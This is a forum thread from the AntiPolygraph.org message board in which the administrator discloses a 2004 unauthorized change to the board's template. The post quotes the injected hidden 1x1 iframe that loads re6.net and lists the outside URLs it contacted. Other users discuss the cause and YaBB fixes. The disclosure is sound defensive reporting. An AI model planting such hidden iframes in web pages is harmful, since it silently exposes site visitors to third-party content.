- Welcome to AntiPolygraph.org Message Board.
A forum for free and open discussion of polygraph-related topics
Posted by Administrator
- Sep 23, 2004, 05:05 AMNo, it is not clear how the template file was modified, though it may have been through a security flaw involving Macromedia Flash files. We disabled flash. In addition, if you are running YaBB, you can upgrade to version 1.3.2, which includes security fixes.
Posted by macagent
- Sep 23, 2004, 01:02 AMI have seen this exact same thing happen to my site. Did you ever find out what happened and how to prevent it?
Posted by Administrator
- Jun 06, 2004, 12:17 AMSimilar hacking incidents have been reported on other websites. See:
http://forums.hostreflex.com/showthread.php?p=1029#post1029
http://forums.eqdkp.com/index.php?showtopic=885
http://forums.hostreflex.com/showthread.php?p=1029#post1029
http://forums.eqdkp.com/index.php?showtopic=885
Posted by Administrator
- Jun 05, 2004, 11:47 PMOn 2 June 2004 at 11:28 hrs Pacific Daylight Time, the AntiPolygraph.org message board's template file was modified without authorization by an unknown person. The following text was inserted into the file:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>
This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are:
http://re6.net/?s=1
http://sowor.ru
http://wall.sowor.ru/?tfnop=mgetx
The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>
This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are:
http://re6.net/?s=1
http://sowor.ru
http://wall.sowor.ru/?tfnop=mgetx
The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.